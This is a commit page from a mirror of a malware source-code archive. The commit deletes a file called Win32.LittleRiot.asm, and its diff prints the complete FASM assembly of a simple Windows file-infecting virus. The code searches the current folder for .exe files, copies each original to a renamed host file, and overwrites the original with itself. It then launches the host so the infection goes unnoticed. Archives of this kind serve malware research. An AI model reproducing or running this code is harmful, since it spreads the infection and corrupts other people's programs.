mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00

Delete Win32.LittleRiot.asm

not vx
vxunderground 2020-10-28 23:24:33 -05:00 committed by GitHub
parent 947d94e90a
commit cf62f2c609
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -1,54 +0,0 @@
include "%fasminc%\win32ax.inc"
LittleRiot: invoke GetCommandLine
mov ebx, eax
inc ebx
xor ecx, ecx
GetEndCmd: cmp byte [ebx], '"'
je HaveEndCmd
inc ebx
inc ecx
jmp GetEndCmd
HaveEndCmd: mov byte [ebx], 0
sub ebx,ecx
push ebx
invoke FindFirstFile, ExeFiles, Win32FindData
mov dword [FindHandle], eax
FindMore: cmp eax, 0
je ExecuteHost
mov ebx, Win32FindData.cFileName
call GetHostName
invoke CopyFile, Win32FindData.cFileName, HostName, 1
cmp eax, 0
je FindNextVictim
pop ebx
invoke CopyFile, ebx, Win32FindData.cFileName, 0
push ebx
FindNextVictim: invoke FindNextFile, dword [FindHandle], Win32FindData
jmp FindMore
ExecuteHost: pop ebx
call GetHostName
invoke WinExec, HostName, SW_SHOWNORMAL
ret
GetHostName : cmp byte [ebx], 0
je RenameHostName
inc ebx
jmp GetHostName
RenameHostName: sub ebx, 8
mov esi, ebx
mov edi, HostName
mov ecx, 5
rep movsb
ret
data import
library kernel32, "KERNEL32.DLL"
import kernel32,\
GetCommandLine, "GetCommandLineA",\
FindFirstFile, "FindFirstFileA",\
FindNextFile, "FindNextFileA",\
CopyFile, "CopyFileA",\
WinExec, "WinExec"
end data
ExeFiles db "*.exe",0
FindHandle dd ?
Win32FindData FINDDATA
HostName rb 6